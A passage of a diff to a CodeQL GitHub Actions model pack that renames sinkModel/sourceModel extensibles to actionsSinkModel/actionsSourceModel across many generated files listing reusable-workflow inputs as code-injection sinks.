a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 42122b5ee22a..56b2ef6691e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index c694d3953f63..7bc952a84834 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 9ecf401cab50..1c0663dd01c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 19fee627702a..4da8f3276622 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4eb201001e14..4e8adfafe3c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 94c7292b655e..28cb702ce13c 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 6088ffcd7023..cb315ee4328c 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 05c4dc8ddf37..956c4cba9669 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index affc12cdc4ad..804c1bdae4e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index b1c4d2f2cbfd..78d91b2afb5f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 4ccbd71f8c36..31cadc3ff179 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 2eb2104b542a..11362fda1e55 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index fee958600308..131cff3e92a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 49a98d4dda55..acc5bf51e357 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index aa432107a0d1..c89d1c808c30 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 40053c68c1a2..0258c79e83f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 645ec756783f..ebeba1eb2268 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 3d80594c0d5e..5f709385839a 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e542d409efe8..e96dbba0699d 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 9cc02d3b38c7..2a7a9afd5a68 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5ebf7426d167..5094422f3fed 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index c5630248f7f9..dff837456454 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 4ea93f374b3c..88b68dc4ea7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index d702e7ad830a..18c6974c74f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index baba2fc1e150..561c3e15e641 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index feb68c4bdd74..961741f413f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index d3b779c1afa2..985652a265b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 6b0e733be176..3103913ab4f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index cf9971e85246..b89c1307d2d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index b3518a7a8eed..9e60cc61bb56 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index a60fba237ef1..cac4e298538b 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 37f2febb70f3..eb2669a96ead 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 6e3d48dbf89c..590e518d3508 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 465fff41145d..d55af595b1cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 3f091f1c9613..1fd6cd394bcc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index efa591f749dd..3583052045b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 4bd74701fde7..f355ceee6da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 34d11e19946b..2b9190c87af8 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index fb4a82488530..783ff3c04682 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index ef3af44da3a8..de853d30588b 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index a8c86c49d7c0..31f09278ecd3 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 40549844d385..d45a2e2a03a0 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index bd180d9b3676..896400bf2f15 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 1e5721f1e7c5..ade06c90c26b 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index b7a14240aed5..f4c2d488ba37 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 